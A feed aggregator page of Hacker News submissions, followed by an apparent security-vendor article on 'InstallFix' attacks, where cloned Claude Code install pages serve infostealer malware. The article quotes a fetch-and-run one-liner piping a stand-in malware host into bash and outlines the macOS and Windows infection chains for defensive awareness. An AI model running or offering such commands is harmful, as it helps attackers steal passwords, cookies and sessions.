Feed aggregator

Article URL: https://www.jakeworth.com/posts/how-i-run-a-software-engineering-standup/

Comments URL: https://news.ycombinator.com/item?id=47308702

Points: 1

# Comments: 0

Article URL: https://t3.codes

Comments URL: https://news.ycombinator.com/item?id=47308694

Points: 1

# Comments: 0

Article URL: https://en.wikipedia.org/wiki/Einstellung_effect

Comments URL: https://news.ycombinator.com/item?id=47308691

Points: 1

# Comments: 0

I've been using Claude Code with multiple accounts (personal + work) and got tired of re-setting up MCP servers, plugins, and permissions for each one.

Settings don't carry over, and switching means logging out or manually managing CLAUDE_CONFIG_DIR.

So I made a simple tool for it. Clausona sets CLAUDE_CONFIG_DIR via a shell hook and symlinks shared resources (plugins, MCP servers, settings) from your primary config.

Auth stays separate per profile. No wrapping or proxying. Claude Code runs directly.

Curious if others have dealt with this and what pain points you've run into.

Thanks for any feedback!

Comments URL: https://news.ycombinator.com/item?id=47308676

Points: 1

# Comments: 0

Article URL: https://duckdb.org/2026/03/09/announcing-duckdb-150

Comments URL: https://news.ycombinator.com/item?id=47308663

Points: 1

# Comments: 0

Comments URL: https://news.ycombinator.com/item?id=47308653

Points: 1

# Comments: 0

Article URL: https://github.com/google-ai-edge/LiteRT-LM/pull/1573

Comments URL: https://news.ycombinator.com/item?id=47308640

Points: 1

# Comments: 0

Article URL: https://github.com/inkandswitch/darn

Comments URL: https://news.ycombinator.com/item?id=47308631

Points: 1

# Comments: 0

Article URL: https://profdrkdc.github.io/boek/?t=claude&v=en#/

Comments URL: https://news.ycombinator.com/item?id=47308628

Points: 1

# Comments: 1

I got excited when I started seeing all the MCP endpoints showing up.

Slack. Google. Microsoft. Salesforce. Reddit!?

I thought: finally — a standard way for AI to integrate with enterprise tools.

So I started building an enterprise MCP gateway.

Simple use case:

30,000 employees running Copilot or Claude.

All connecting to MCP tools.

Step 1: build a gateway.

Step 2: connect directory.

Step 3: assign MCP tools to users.

So far so good.

Then reality started stacking up.

Problem #1

You can’t let 30,000 employees authenticate directly to every MCP endpoint. So the gateway uses admin credentials.

Congrats.

Now your AI system technically has access to every Teams message in the company.

Problem #2

LLMs reason in natural language.

MCP tools expose REST wrappers.

Nancy asks:

“Summarize the marketing channel from yesterday.”

The tool expects:

get_messages(channel_id=847239)

So now you’re dynamically mapping IDs to names and rebuilding tool schemas per user.

Problem #3

OAuth tokens expire.

Now your gateway is refreshing tokens, retrying calls, translating requests, rebuilding responses, and basically turning into a giant middleware monster.

At this point I realized something:

MCP isn’t the problem, Nancy is not the problem either.

MCP It’s actually great.

But the industry is trying to use it to solve the wrong layer of the problem.

Trying to wire enterprise AI together through direct MCP tool connections is not architecture.

It’s integration chaos.

What we’re missing isn’t more connectors.

What we’re missing is ... well thats what I"m working on now, it involves abstract agent routing - like Layer 3.5 for AI.

Until then - I really care about Nancy and all the poor bastards working in large companies that will figure this out too but can't walk away because they need that two week pay.

Sense of humor but I"m making a point MCP = Missing Core Parts trying to use it on a enterprise level for AI Integration in a walled garden its just not going to work.

Comments URL: https://news.ycombinator.com/item?id=47308624

Points: 1

# Comments: 0

Hi HN,

I built Aurora Subtitles, a Windows application that generates real-time subtitles and translation from microphone or system audio.

Everything runs locally using Whisper for transcription and NLLB for translation. CUDA acceleration is supported to reduce latency, and subtitles appear as an overlay on screen.

The goal was to create something useful for: - voice chats and Discord - games - meetings - accessibility, including helping people with hearing impairments

No cloud APIs are required and everything runs locally.

Feedback is very welcome.

Comments URL: https://news.ycombinator.com/item?id=47308621

Points: 1

# Comments: 0

Article URL: https://schooly-waitinglist.app/

Comments URL: https://news.ycombinator.com/item?id=47308602

Points: 1

# Comments: 0

Article URL: https://another.rodeo/straight-talk-ic-path/

Comments URL: https://news.ycombinator.com/item?id=47308597

Points: 1

# Comments: 0

Article URL: https://phys.org/news/2026-03-dense-dark-forests-europe-modern.html

Comments URL: https://news.ycombinator.com/item?id=47308594

Points: 1

# Comments: 0

Article URL: https://www.cnn.com/2026/03/08/health/nostril-breathing-wellness-conversation

Comments URL: https://news.ycombinator.com/item?id=47308564

Points: 1

# Comments: 0

See what your agents did, when, and under what terms.

Comments URL: https://news.ycombinator.com/item?id=47308559

Points: 1

# Comments: 0

Article URL: https://third-bit.com/dsdx/mapreduce/

Comments URL: https://news.ycombinator.com/item?id=47308553

Points: 1

# Comments: 0

Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.

Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator.

Researchers found that attackers abuse this workflow by keeping everything identical, only changing where that one‑liner actually connects to. For many non‑specialist users who just started using AI and developer tools, this method feels normal, so their guard is down.

But this basically boils down to “I trust this domain” and that’s not a good idea unless you know for sure that it can be trusted.

It usually plays out like this. Someone searches “Claude Code install” or “Claude Code CLI,” sees a sponsored result at the top with a plausible URL, and clicks without thinking too hard about it.

But that ad leads to a cloned documentation or download page: same logo, same sidebar, same text, and a familiar “copy” button next to the install command. In many cases, any other link you click on that fake page quietly redirects you to the real vendor site, so nothing else looks suspicious.

Similar to ClickFix attacks, this method is called InstallFix. The user runs the code that infects their own machine, under false pretenses, and the payload usually is an infostealer.

The main payload in these Claude Code-themed InstallFix cases is an infostealer called Amatera. It focuses on browser data like saved passwords, cookies, session tokens, autofill data, and general system information that helps attackers profile the device. With that, they can hijack web sessions and log into cloud dashboards and internal administrator panels without ever needing your actual password. Some reports also mention an interest in crypto wallets and other high‑value accounts.

Windows and Mac

The Claude Code-based campaign the researchers found was equipped to target both Windows and Mac users.

On macOS, the malicious one‑liner usually pulls a second‑stage script from an attacker‑controlled domain, often obfuscated with base64 to look noisy but harmless at first glance. That script then downloads and runs a binary from yet another domain, stripping attributes and making it executable before launching it. 

On Windows, the command has been seen spawning cmd.exe, which then calls mshta.exe with a remote URL. This allows the malware logic to run as a trusted Microsoft binary rather than an obvious random executable. In both cases, nothing spectacular appears on screen: you think you just installed a tool, while the real payload silently starts doing its work in the background.

How to stay safe

With ClickFix and InstallFix running rampant—and they don’t look like they’re going away anytime soon—it’s important to be aware, careful, and protected.

• Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Analyze what the command will do, before you run it.
• Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
• Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
• Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
• Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This is the best balance of future-proofing and price for now, but this may not be the final iPad release this year.

Apple's new $599 budget phone brings MagSafe compatibility, higher base storage and an A19 chip. That makes the trade-offs easier to swallow.